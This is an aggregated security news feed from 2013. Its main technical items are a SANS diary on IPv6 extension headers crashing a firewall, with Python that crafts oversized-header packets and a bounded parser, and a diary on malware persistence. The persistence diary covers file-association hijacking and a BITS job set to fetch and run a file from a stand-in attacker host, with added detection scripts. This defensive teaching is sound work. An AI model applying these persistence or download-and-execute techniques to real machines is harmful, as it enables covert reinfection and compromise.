(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Genesco, a specialty retailer of footwear, sports apparel and related accessories, has sued Visa USA for $13.3 million in fines that were assessed against the company after a credit card data breach in 2010.
LinuxSecurity.com: Several security issues were fixed in the kernel.
LinuxSecurity.com: Several security issues were fixed in Puppet.
LinuxSecurity.com: Updated tomcat5 packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5. The Red Hat Security Response Team has rated this update as having [More...]
LinuxSecurity.com: Updated kernel packages that fix two security issues and several bugs are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having [More...]
LinuxSecurity.com: Updated qemu-kvm-rhev packages that fix one security issue are now available for Red Hat OpenStack Folsom. The Red Hat Security Response Team has rated this update as having [More...]
LinuxSecurity.com: PHP could be made to expose sensitive information over the network.
LinuxSecurity.com: A security issue was identified and fixed in mozilla firefox: VUPEN Security, via TippingPoint's Zero Day Initiative, reported a use-after-free within the HTML editor when content script is run by the document.execCommand() function while internal editor operations [More...]
LinuxSecurity.com: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical [More...]
LinuxSecurity.com: Multiple vulnerabilities have been found and corrected in coreutils: Long line inputs could trigger a segfault in the sort, uniq and join utilities (CVE-2013-0221, CVE-2013-0222, CVE-2013-0223). [More...]
LinuxSecurity.com: Multiple vulnerabilities have been found and corrected in openssh: The auth_parse_options function in auth-options.c in sshd in OpenSSH before 5.7 provides debug messages containing authorized_keys command options, which allows remote authenticated users to obtain potentially [More...]
LinuxSecurity.com: Thunderbird could be made to crash or run programs as your login.
LinuxSecurity.com: Multiple vulnerabilities were discovered in Puppet, a centralized configuration management system. CVE-2013-1640 [More...]

For the first time ever, the Obama administration has publicly admitted to developing offensive cyberweapons that could be aimed at foreign nations during wartime.

According to an article published Tuesday night by The New York Times, that admission came from General Keith Alexander, the chief of the military's newly created Cyber Command. He said officials are establishing 13 teams of programmers and computer experts who would focus on offensive capabilities. Previously, Alexander publicly emphasized defensive strategies in electronic warfare to the almost complete exclusion of offense.

"I would like to be clear that this team, this defend-the-nation team, is not a defensive team," Alexander, who runs both the National Security Agency and the new Cyber Command, told the House Armed Services Committee on Tuesday. "This is an offensive team that the Defense Department would use to defend the nation if it were attacked in cyberspace. Thirteen of the teams that we’re creating are for that mission alone."


Google will pay $7 million to US states and will have to run a "Privacy Week" annually for the next ten years as part of the settlement over its sniffing of Wi-Fi data from its Street View cars.

Cisco Video Surveillance Operations Manager Multiple vulnerabilities
Foscam Prior to Directory Traversal Vulnerability
VMware View CVE-2012-5978 Directory Traversal Vulnerability
[ MDVSA-2013:024 ] firefox
[ MDVSA-2013:023 ] coreutils
Re: [CVE-REQUEST] Foscam <= path traversal vulnerability
March's Patch Tuesday updates contain fixes for Internet Explorer 8 and a USB drive exploit. Plus, the company released non-security updates.


Kaspersky today released an update to its personal firewall product for Windows. The patched vulnerability fits very nicely into our current focus on IPv6.

A packet with a large Destination Options header caused the firewall to crash and drop all traffic.

IPv6 uses a very minimal IP header. Instead of providing space for options or fragmentation fields, many of these features are now implemented by extension headers. As a rule of thumb, most of your packets passing a firewall will not use extension headers, but extension headers do pose a challenge to firewalls.

In IPv4, the IPv4 header is typically followed directly by a transport protocol header like TCP or UDP. A firewall needs to collect information from the IP header as well as the transport protocol header in order to make its filtering decision. For IPv4, the maximum IPv4 header size is 60 bytes, and at most another 60 bytes can be used for the TCP header.

In IPv6, one or more extension headers may be inserted between the IPv6 header and the transport header. Some of these extension headers can be up to 2 kBytes in length. As a result, firewalls need to inspect more data in order to make a filter decision about the packet.

The vulnerability in Kaspersky's product was found using the THC IPv6 test suite. It includes a tool, firewall6, that can be used to create various odd and malformed IPv6 packets to test firewalls. Several of the options (for example tests 18 and 19) produce packets with Destination Options headers exceeding 2,000 bytes. These tests crashed Kaspersky's firewall.

An excerpt from a packet created by test 19 is shown below:

Internet Protocol Version 6, Src: fe80::20c:29ff:fe27:cb5a (fe80::20c:29ff:fe27:cb5a), Dst: ff02::1 (ff02::1)
0110 .... = Version: 6
Next header: IPv6 fragment (44)
Hop limit: 255
Destination: ff02::1 (ff02::1)
Fragmentation Header
Destination Option
Next header: IPv6 destination option (60)
Length: 254 (2040 bytes)
IPv6 Option (Pad1)

The Next Header field in the IPv6 header points to a Fragment header: the packet was too large for the local MTU of 1,500 bytes. The Fragment header is then followed by a fragmented, large Destination Options header. That header contains only Pad1 options, used to fill the 2,040 bytes.

This particular test also sets the Next Header field of the Destination Options header to destination options (60), promising a second Destination Options header to follow, but this does not appear to be the trigger: other tests that crash Kaspersky do not have this feature, while the long Destination Options header is common to all of them.
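To make the "more data before the transport header" point concrete, here is an added example (my code, not the diary's and not part of the THC IPv6 suite). It builds a packet with the same shape as the test 19 excerpt above, IPv6 then Fragment then a 2,040-byte Destination Options header of Pad1 options (Hdr Ext Len 254), using the addresses from the dissection, and then walks the extension-header chain the way a filter must to reach the transport header. The walker applies the per-header length rules (Fragment is fixed at 8 bytes, AH counts 4-octet units, the rest count 8-octet units beyond the first 8) and enforces an inspection budget, so an oversized chain is dropped rather than parsed off the end of the buffer. The transport header, TCP port numbers, fragment identification and the budget values are my choices; the THC test itself points the Destination Options header's Next Header at another Destination Options header rather than at TCP.

```python
import struct

IPV6_HDR_LEN = 40
HOPOPT, TCP, UDP, ROUTING, FRAGMENT, AH, DSTOPTS = 0, 6, 17, 43, 44, 51, 60
EXTENSION_HEADERS = {HOPOPT, ROUTING, FRAGMENT, AH, DSTOPTS}

# Addresses from the diary's dissection: fe80::20c:29ff:fe27:cb5a -> ff02::1
SRC = bytes.fromhex("fe80" + "0000" * 3 + "020c29fffe27cb5a")
DST = bytes.fromhex("ff02" + "00" * 13 + "01")


def ipv6(next_header, payload, hop_limit=255):
    """Fixed 40-byte IPv6 header (version 6, zero traffic class and flow label)."""
    return struct.pack("!IHBB", 6 << 28, len(payload), next_header, hop_limit) + SRC + DST + payload


def fragment_header(next_header, offset_units, more, ident=0x1234):
    """8-byte Fragment header; offset in 8-octet units, M flag in bit 0 (assumed ident)."""
    return struct.pack("!BBHI", next_header, 0, (offset_units << 3) | more, ident)


def dstopts(next_header, option_bytes):
    """Destination Options header filled with Pad1 (type 0) options.
    Hdr Ext Len counts 8-octet units beyond the first 8 octets, so the
    longest legal header is (255 + 1) * 8 = 2048 bytes."""
    total = 2 + option_bytes
    if total % 8 or total // 8 - 1 > 255:
        raise ValueError("bad Destination Options length")
    return bytes([next_header, total // 8 - 1]) + b"\x00" * option_bytes


def tcp_syn(sport=12345, dport=80):
    """Minimal 20-byte TCP SYN header; checksum left zero (irrelevant here)."""
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x02, 8192, 0, 0)


def walk_chain(packet, budget=None):
    """Return (transport_proto, offset, [(ext_hdr, length), ...]).

    transport_proto is None for a non-initial fragment, whose transport
    header lives in another datagram. Raises ValueError on a malformed or
    truncated chain, or once more than `budget` bytes of extension headers
    would have to be read: bounding that work is what keeps an oversized
    header from becoming a crash in the inspection code.
    """
    if len(packet) < IPV6_HDR_LEN or packet[0] >> 4 != 6:
        raise ValueError("not an IPv6 packet")
    end = min(len(packet), IPV6_HDR_LEN + struct.unpack("!H", packet[4:6])[0])
    nh, off, seen = packet[6], IPV6_HDR_LEN, []
    while nh in EXTENSION_HEADERS:
        if off + 8 > end:
            raise ValueError("extension header %d truncated at offset %d" % (nh, off))
        if nh == FRAGMENT:
            hlen = 8                              # always 8 bytes, no length field
        elif nh == AH:
            hlen = (packet[off + 1] + 2) * 4      # AH counts 4-octet units (RFC 4302)
        else:
            hlen = (packet[off + 1] + 1) * 8      # Hop-by-Hop, Routing, Dst Options
        if off + hlen > end:
            raise ValueError("header %d claims %d bytes, only %d present" % (nh, hlen, end - off))
        if budget is not None and off + hlen - IPV6_HDR_LEN > budget:
            raise ValueError("extension chain exceeds %d-byte inspection budget" % budget)
        seen.append((nh, hlen))
        if nh == FRAGMENT and struct.unpack("!H", packet[off + 2:off + 4])[0] >> 3:
            return None, off + 8, seen            # non-initial fragment
        nh, off = packet[off], off + hlen
    return nh, off, seen


def filter_decision(packet, budget=256):
    """A stateless filter's verdict: ("pass", proto, offset) or ("drop", why).
    Never raises, so a hostile chain cannot take the filter down."""
    try:
        proto, off, _ = walk_chain(packet, budget)
    except ValueError as exc:
        return ("drop", str(exc))
    if proto is None:
        return ("drop", "non-initial fragment; needs reassembly state")
    return ("pass", proto, off)


def test19_like_packet():
    """Reassembled datagram: Fragment(8) + DstOpts(2040 bytes, Pad1) + TCP(20)."""
    return ipv6(FRAGMENT, fragment_header(DSTOPTS, 0, 0) + dstopts(TCP, 2038) + tcp_syn())


def test19_first_fragment(mtu=1500):
    """The first fragment that actually hits a 1500-byte link: only the start
    of the 2040-byte Destination Options header fits, so a filter that looks
    at one fragment on its own cannot reach the transport header at all."""
    fragmentable = dstopts(TCP, 2038) + tcp_syn()
    room = (mtu - IPV6_HDR_LEN - 8) // 8 * 8      # fragments carry multiples of 8
    return ipv6(FRAGMENT, fragment_header(DSTOPTS, 0, 1) + fragmentable[:room])


if __name__ == "__main__":
    for name, pkt in (("reassembled", test19_like_packet()), ("first fragment", test19_first_fragment())):
        print("%-15s %5d bytes  budget=2100 -> %s" % (name, len(pkt), filter_decision(pkt, 2100)))
        print("%-15s %5d bytes  budget=128  -> %s" % (name, len(pkt), filter_decision(pkt, 128)))
```

On the reassembled datagram the walker has to read 2,048 bytes of extension headers before it finds TCP at offset 2,088; with a 128-byte budget the same packet is dropped with a reason instead of being parsed. The first on-the-wire fragment is dropped for a different reason: its Destination Options header claims 2,040 bytes but only 1,448 are present, which is exactly the situation a firewall that does not reassemble fragments has to handle safely.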


Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Since the start of the year, hackers have been exploiting vulnerabilities in Java to carry out a string of attacks against companies including Microsoft, Apple, Facebook and Twitter, as well as home users. Oracle has made an effort to respond faster to the threats and to strengthen its Java software, but security experts say the attacks are unlikely to let up any time soon.
The question of whether you're getting the bandwidth you pay for is one that just doesn't go away. Twice in the last few months I've suspected my ADSL connection of running slow and, sure enough, despite the modem telling me I had 3Mbps down and 500Kbps up, for whatever reason, restarting the modem fixed the problem.
Android head Andy Rubin is stepping aside, and that could mean big changes for Google's mobile platform and for its Chrome operating system.
Try this, try that and see what entices customers. That's the mantra for tablet makers that are experimenting with new tablet features in the elusive quest to deliver the next big hit.
Amazon on Wednesday lowered the starting price of its large-screen 8.9-in. Kindle Fire HD tablet in the U.S. to $269 for the Wi-Fi version and to $399 for the 4G version.
With the intent of rounding out its software stack for building hybrid clouds, Oracle is acquiring Nimbula, a provider of private cloud infrastructure management software.
For the Internet of Things to become a reality, networks need to get a whole lot smarter and more flexible, according to Cisco.
Microsoft has fixed a problem that caused an outage for many users of Hotmail and the service that is replacing it, Outlook.com. Maintenance work continued to affect the calendaring component of Hotmail, however.
Google's decision to bring its Android and Chrome divisions together under Sundar Pichai should result in greater work between the two platforms, but Pichai first needs to rein in the fast expanding operating system and bring some order to the business, analysts said Wednesday.
Few tech industry buzzwords have gotten as vigorous a workout as "big data," but while the hype remains plentiful, it is starting to give way to real-life successes as well as formal ways companies can develop big data strategies, according to a number of IDC analysts.
Offensive Security has launched Kali Linux, a version of the well-known BackTrack pentesting distribution targeted at enterprises. The company has partnered with Rapid7 to integrate the Metasploit framework as an officially supported tool.

Announcing ChronIC - a wearable Sub-GHz RF hacking tool
Re: Squid 3.2.7 DoS (loop, 100% cpu) strHdrAcptLangGetItem() at errorpage.cc
If you're not sure about the purpose behind Daiyuu Nobori's online thesis project, perhaps the large picture of the collapse of the Berlin Wall will help.
Calculating the real ROI of cloud apps requires the analysis of a lot of factors, and cutting corners on that process means you might not save money.
Microsoft will release security updates for applications in its Windows Store as those patches are available in order to speed up the updating process.
Google has acquired a startup from the computer science department of the University of Toronto to get key researchers in the area of deep neural networks.
The number of teenagers in the U.S. using smartphones has risen sharply, with half of them accessing the Internet mainly through the device, according to a recent study.
New HTC One smartphone will arrive later than expected, and could lose any time-to-market advantage over Samsung's upcoming Galaxy S4 handset.
BlackBerry faces a herculean task marketing the new Z10 smartphone to U.S. consumers.
The most interesting of the holes Microsoft has closed on its monthly patch day is only rated "important". It allows passing security staff and colleagues to hijack a Windows PC.

Oracle Java SE CVE-2012-3342 Remote Java Runtime Environment Vulnerability
Oracle Java SE CVE-2012-1541 Remote Java Runtime Environment Vulnerability

Details from some of the famous identity-theft victims whose personal information was mysteriously published online were fraudulently obtained from a government-mandated website designed to make it easy for consumers to access their credit reports, credit agency officials said.

At least four of the high-profile celebrities and political figures—who include Vice President Joe Biden, FBI Director Robert Mueller, Attorney General Eric Holder, and rap star Jay Z—were "accessed inappropriately" from annualcreditreport.com, a spokesman for credit agency Equifax told Ars. The site allows consumers to obtain a free copy of their credit reports by entering their birth dates, Social Security numbers, and home addresses and then answering several multiple-choice questions involving previous addresses, mortgages or loans taken out, and similar types of information. Once someone provides the correct answers, he gets access to a report providing a wealth of additional personal information, including loan and mortgage details, phone numbers, and previous addresses.

"What it appears happened is that personal identifiable information was evidently accessed or somehow obtained by the fraudsters who therefore were able to go into annualcreditreport.com and get some pieces of information on some individuals," Equifax spokesman Tim Klein said in an interview. "It's four individuals that we can confirm that were accessed inappropriately by fraudsters by going through annualcreditreport.com and procuring some information off their Equifax credit report."



At Shmoocon 2013 Jake Williams (@MalwareJake) and I gave a presentation entitled Wipe the Drive. The point of the presentation was that you should always wipe the drive and reinstall the OS after a confirmed malware infection. We all know wiping the drive is the safest move, but there are business pressures to simply remove the known malware and move on. Also, because we are security professionals, there is often an expectation that we are able to remove all the malware. But in my and Jake's opinion, relying on a clean scan from antivirus products isn't the best approach. The time and effort required to accurately analyze the capabilities of malware and conduct forensic analysis to determine whether those capabilities were used is usually not in the cards. There is always an element of risk management, but whenever you possibly can, just wipe the drive.

To illustrate the point we began developing a list of ways that malware or an active attacker on your computer can make small configuration changes to your machine. The changes create a misconfiguration that makes the target exploitable, or set events in motion that will cause the target to automatically get re-compromised in the future. There is a very large number of changes and misconfigurations that attackers can make, but our talk focused on eight of them. The only criterion for these techniques is that they launch a process in an unusual way, and ideally they don't leave any process running (so they evade detection by memory forensics). I will discuss a few of the methods we came up with and how you might detect these changes. First let's talk about file extension hijacking.

TECHNIQUE #1 - File Associations Hijacking

What happens when you click on a .TXT file? The operating system checks HKEY_CLASSES_ROOT for the extension to see what program it should launch. Here we see the association for .TXT files mapped to the txtfile ProgId.

Further down in the HKEY_CLASSES_ROOT hive we find the entry for txtfile where the applications that are used to open and print are defined. Here you can see that NOTEPAD.EXE is the application that will launch when the OS tries to OPEN a txt file.

What if the attacker or his malware changes this association? Instead of launching NOTEPAD.EXE, it tells the OS to launch NOTPAD.EXE. NOTPAD.EXE is a wrapper around the real NOTEPAD.EXE, but it also contains a malicious payload. During the initial infection the attacker makes this change and leaves his NOTPAD.EXE behind. You remove the initial attack vector and do memory forensics, finding nothing running on the host. Sometime later, after memory of the incident fades, the administrator checks his logs by clicking on a .TXT file. It launches NOTPAD.EXE, which in turn launches NOTEPAD.EXE and reinfects the machine.

In an alternate version of this attack a new file extension is created, such as .WTD, and associated with the attacker's program. When the attacker is ready to reinfect you, they send an email with an attachment using the .WTD extension. When it is opened on the victim's machine, they are reinfected.

I am sure some of you will say, "But NOTPAD.EXE will be detected by AV." Perhaps, but remember that the point of these techniques is to evade memory forensics. For the most part, evading antivirus software is trivial.


How do you detect this? Baseline the contents of your HKEY_CLASSES_ROOT registry key and then periodically check its current state against that baseline. Investigate any changes to see what executes when you click on a file with an extension that has changed. We all know it is dangerous to click links on the internet. Unfortunately, links on your computer aren't any safer once an attacker has had a chance to change where they go.
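Here is one way to do that baseline comparison, as an added example (my code, not from the diary). It takes two text exports of the kind `reg export HKEY_CLASSES_ROOT baseline.reg` produces (the file is UTF-16 on disk; decode it before passing it in), follows each extension's (Default) value to its ProgId and from there to the `shell\open\command` (Default) value, and reports every extension whose resolved open command changed or that did not exist in the baseline. REG_EXPAND_SZ commands, which is what the stock txtfile entry is, are exported as `hex(2):` UTF-16LE byte lists with continuation lines, so the parser decodes those too. The two exports are constructed sample data that reproduce the NOTPAD.EXE swap and the new .WTD extension described above; the paths for NOTPAD.EXE and wtd.exe are invented.

```python
import re

# Constructed sample export: the stock .txt -> txtfile -> NOTEPAD.EXE chain.
BASELINE = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.txt]
@="txtfile"

[HKEY_CLASSES_ROOT\txtfile]
@="Text Document"

[HKEY_CLASSES_ROOT\txtfile\shell\open\command]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,\
  5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,4e,00,4f,00,54,00,\
  45,00,50,00,41,00,44,00,2e,00,45,00,58,00,45,00,20,00,25,00,31,00,00,00
'''

# Constructed sample export after the attacker's changes (paths invented).
CURRENT = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.txt]
@="txtfile"

[HKEY_CLASSES_ROOT\.wtd]
@="wtdfile"

[HKEY_CLASSES_ROOT\txtfile]
@="Text Document"

[HKEY_CLASSES_ROOT\txtfile\shell\open\command]
@="C:\\Windows\\system32\\NOTPAD.EXE %1"

[HKEY_CLASSES_ROOT\wtdfile\shell\open\command]
@="C:\\Users\\Public\\wtd.exe %1"
'''

KEY_RE = re.compile(r'^\[(.+)\]$')
SZ_RE = re.compile(r'^@="(.*)"$')            # REG_SZ (Default) value
HEX2_RE = re.compile(r'^@=hex\(2\):(.*)$')   # REG_EXPAND_SZ (Default) value


def _decode_hex2(hexbuf):
    """hex(2) values are comma-separated UTF-16LE bytes, NUL-terminated."""
    data = bytes(int(h, 16) for h in hexbuf.split(',') if h)
    return data.decode('utf-16-le').rstrip('\x00')


def parse_reg(text):
    """Map lower-cased key path -> its (Default) value, for keys that set one."""
    values, key, hexbuf = {}, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if hexbuf is not None:                     # continuation line of a hex(2) value
            hexbuf += line.rstrip('\\')
            if not line.endswith('\\'):
                values[key], hexbuf = _decode_hex2(hexbuf), None
            continue
        m = KEY_RE.match(line)
        if m:
            key = m.group(1).lower()
            continue
        m = HEX2_RE.match(line)
        if m and key:
            hexbuf = m.group(1).rstrip('\\')
            if not line.endswith('\\'):
                values[key], hexbuf = _decode_hex2(hexbuf), None
            continue
        m = SZ_RE.match(line)
        if m and key:                              # .reg escapes \ and " inside strings
            values[key] = m.group(1).replace('\\\\', '\\').replace('\\"', '"')
    return values


def open_commands(values):
    """extension -> (ProgId, open command), following
    HKCR\\.ext (Default) -> HKCR\\<ProgId>\\shell\\open\\command (Default)."""
    chain = {}
    for key, progid in values.items():
        if key.startswith('hkey_classes_root\\.') and key.count('\\') == 1:
            cmd = values.get('hkey_classes_root\\%s\\shell\\open\\command' % progid.lower())
            chain[key.split('\\')[-1]] = (progid, cmd)
    return chain


def diff_associations(baseline_text, current_text):
    """[(extension, baseline_command, current_command)] for every extension
    whose resolved open command differs; None marks a missing side."""
    before = open_commands(parse_reg(baseline_text))
    after = open_commands(parse_reg(current_text))
    findings = []
    for ext in sorted(set(before) | set(after)):
        b, a = before.get(ext, (None, None))[1], after.get(ext, (None, None))[1]
        if a != b:
            findings.append((ext, b, a))
    return findings


if __name__ == "__main__":
    for ext, before, after in diff_associations(BASELINE, CURRENT):
        print("%-6s was: %-40s now: %s" % (ext, before, after))
```

Run against the samples it reports .txt moving from `%SystemRoot%\system32\NOTEPAD.EXE %1` to the NOTPAD.EXE wrapper and .wtd appearing with no baseline entry. One caveat when you use this on a real host: per-user choices under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts can override the HKCR mapping for that user, so export and diff that key for each profile as well.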


TECHNIQUE #2 - BITS Jobs

BITS is the Background Intelligent Transfer Service. This service is used by your operating system to download patches from Microsoft or your local WSUS server. But this service can also be used to schedule the download of an attacker's malware to reinfect your system. Once the attacker or his malware is on your machine, he executes BITSADMIN to schedule the download of http://attackersite.com/malware.exe. He configures the job to retry the URL only once a day and to automatically execute the program after it is successfully downloaded. The attacker doesn't put anything at that URL today. Instead, he simply waits for you to finish your incident handling process and look the other way. You can scan the machine with 100 different virus scanners: today there is no file on your system to detect. You can do memory forensics all day: sorry, there is nothing running today. Today it is just a simple configuration change to the OS. Then, when he is ready, he places malware.exe on his site. Your machine dutifully downloads the new malware and executes it.


This one is easier to find. The BITSADMIN tool also lets you view scheduled downloads. You can get a list of scheduled jobs with the command BITSADMIN /LIST.

Here you can see there is a job called getsome that is currently scheduled on this machine. BITSADMIN /LISTFILES jobname takes a scheduled job as a parameter and returns the list of URLs the job is scheduled to download. For example, here we see that job getsome is scheduled to download from the URL HTTP://attackerssite.com/malware.exe and will save the file as c:\temp\malware.exe.

But how does the malware execute after it is downloaded? BITS allows you to schedule a command to execute after a successful download to notify you that the job is finished. The intention is that you can execute a program that sends you an email or fires an alert in a network monitoring system. Let's check the notification command for this job with BITSADMIN /GETNOTIFYCMDLINE jobname, which takes the job name as its argument:

Here you can see that after the malware is successfully downloaded to c:\temp\malware.exe, the BITS service will launch c:\temp\malware.exe to "notify the administrator".
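The three BITSADMIN switches above can be scripted into a single audit, which is what the following added example does (my code, not from the diary). It runs `bitsadmin /list /allusers`, then `/listfiles` and `/getnotifycmdline` for each job GUID found, and flags any job with a notification command set, with a stronger verdict when the notification program is one of the files the job itself downloads, exactly the getsome case. The bitsadmin calls go through a pluggable `run` callable so the parsing can be exercised offline; FAKE_OUTPUT is constructed sample text modelled on bitsadmin's output, and since the exact wording differs between Windows versions you should confirm the regexes match something on a real box before trusting a clean result. The GUIDs, the second job and the WSUS URL are invented.

```python
import re
import subprocess

GUID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")
NAME_RE = re.compile(r"'([^']*)'")
FILE_RE = re.compile(r"(\S+)\s*->\s*(.+?)\s*$")                     # remote -> local
NOTIFY_RE = re.compile(r"notification command line is\s*'([^']*)'", re.I)

# Constructed sample output (bitsadmin's real wording may differ by version).
FAKE_OUTPUT = {
    ("/list", "/allusers"): (
        "BITSADMIN version 3.0 [ 7.5.7601 ]\n"
        "{8E3F2A91-3C2B-4D4E-9F10-2B7C9D1E5A60} 'getsome' TRANSIENT_ERROR 0 / 1 0 / UNKNOWN\n"
        "{0D3B6C2A-7E41-4A7B-8C3F-11AA22BB33CC} 'WU Client Download' TRANSFERRED 1 / 1 61440 / 61440\n"
        "Listed 2 job(s).\n"),
    ("/listfiles", "{8E3F2A91-3C2B-4D4E-9F10-2B7C9D1E5A60}"):
        "0 / UNKNOWN WORKING http://attackersite.com/malware.exe -> c:\\temp\\malware.exe\nListed 1 file(s).\n",
    ("/getnotifycmdline", "{8E3F2A91-3C2B-4D4E-9F10-2B7C9D1E5A60}"):
        "the notification command line is 'c:\\temp\\malware.exe' ''\n",
    ("/listfiles", "{0D3B6C2A-7E41-4A7B-8C3F-11AA22BB33CC}"):
        "61440 / 61440 TRANSFERRED http://wsus.corp.example/Content/ab.cab -> C:\\Windows\\SoftwareDistribution\\Download\\ab.cab\nListed 1 file(s).\n",
    ("/getnotifycmdline", "{0D3B6C2A-7E41-4A7B-8C3F-11AA22BB33CC}"):
        "the notification command line is '' ''\n",
}


def run_bitsadmin(*args):
    """Real invocation; run elevated so /allusers shows every account's jobs."""
    return subprocess.run(["bitsadmin"] + list(args), capture_output=True, text=True).stdout


def fake_run(*args):
    """Offline stand-in for run_bitsadmin, serving the constructed output."""
    return FAKE_OUTPUT.get(tuple(args), "")


def list_jobs(run):
    """Return [(guid, display_name), ...] parsed from `bitsadmin /list /allusers`."""
    jobs = []
    for line in run("/list", "/allusers").splitlines():
        g = GUID_RE.search(line)
        if g:
            n = NAME_RE.search(line[g.end():])
            jobs.append((g.group(0), n.group(1) if n else ""))
    return jobs


def audit_jobs(run=run_bitsadmin):
    """One tuple per job: (guid, name, [local paths], notify_cmd, verdict).

    verdict is 'execute-own-download' when the notify program is a file the
    job itself fetches (the diary's trick), 'notify-set' for any other notify
    command (investigate it), and 'ok' when no notify command is configured.
    """
    findings = []
    for guid, name in list_jobs(run):
        local_paths = [m.group(2) for m in map(FILE_RE.search, run("/listfiles", guid).splitlines()) if m]
        m = NOTIFY_RE.search(run("/getnotifycmdline", guid))
        notify = m.group(1) if m else ""
        if notify and notify.lower() in (p.lower() for p in local_paths):
            verdict = "execute-own-download"
        elif notify:
            verdict = "notify-set"
        else:
            verdict = "ok"
        findings.append((guid, name, local_paths, notify, verdict))
    return findings


if __name__ == "__main__":
    for guid, name, paths, notify, verdict in audit_jobs(fake_run):
        print("%-21s %s %-20r files=%s notify=%r" % (verdict, guid, name, paths, notify))
```

Replace `fake_run` with the default `run_bitsadmin` to audit a live host. Note that a notification command that points at anything other than your own alerting tooling deserves a look even when it is not the downloaded file itself, since the attacker can just as easily have BITS run an already-present LOLBin with the download as its argument.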


Add checking the BITSADMIN queue to your incident response checklist. If you find something scheduled, don't rely on simply deleting the job. In a moderately complex operating system there are countless places to hide. I'll talk about more of these types of techniques during my upcoming handler shifts. When you have malware on your machine, just wipe the drive.

Follow me on Twitter @MarkBaggett

Here is an AWESOME DEAL on some SANS training. Join Justin Searle and me for SANS' new SEC573 Python for Penetration Testers course at SANSFire June 17-21. It is a BETA, so the course is 50% off! Sign up today!


There are two opportunities to join Jake Williams for FOR610 Reverse Engineering Malware. Join him on vLive with Lenny Zeltser or at the Digital Forensics Incident Response Summit in Austin.

vLive with Jake and Lenny begins March 28th, 2013:


Jake at DFIR Austin Texas July 11-15, 2013:

http://www.sans.org/event/dfir-summit-2013/course/reverse-engineering-malware-malware-analysis-tools-techniques
Microsoft experienced disruptions for several hours to its online suite of mail, calendar and storage services, leaving many users unable to access their accounts.

Posted by InfoSec News on Mar 12


By Kim Zetter
Threat Level

A sports apparel retailer is fighting back against the arbitrary
multi-million-dollar penalties that credit card companies impose on banks and
merchants for data breaches by filing a first-of-its-kind $13 million lawsuit
against Visa.

The suit takes on the payment card industry’s powerful money-making system of
punishing merchants...

Posted by InfoSec News on Mar 12


By John Leyden
The Register
12th March 2013

An open-source IT monitoring software firm has clashed with a security
consultancy over the seriousness of a security bug in its technology.

GroundWork's technology provides a platform for IT operations management
(network, system, application, and cloud monitoring) that is used by customers
including Hitachi Data...

Posted by InfoSec News on Mar 12


By Jeremy Kirk
IDG News Service
March 12, 2013

A website that provides U.S. consumers with a free annual credit report
appears to have been the source used by hackers to download those of
celebrities including Beyoncé and government officials including
Federal Bureau of Investigation Director Robert Mueller.

On Tuesday, a...

Posted by InfoSec News on Mar 12

Forwarded from: M <mmca (at) layerone.org>


LayerOne 2013 Security Conference
Call for Papers
The 2013 Call for Paper is currently OPEN.

LayerOne 2013 Security Conference
May 25-26, 2013
Monrovia, California
(Monrovia Doubletree)


The ninth annual LayerOne security conference is now accepting submissions for
topic and speaker selection. As always, we are interested in seeing a...

Posted by InfoSec News on Mar 12


By Ellen Nakashima
The Washington Post
March 12, 2013

The Pentagon’s Cyber Command will create 40 offensive cyber-teams by the fall
of 2015 to help defend the nation against major computer attacks and assist
combat commands as they plan offensive capabilities, Gen....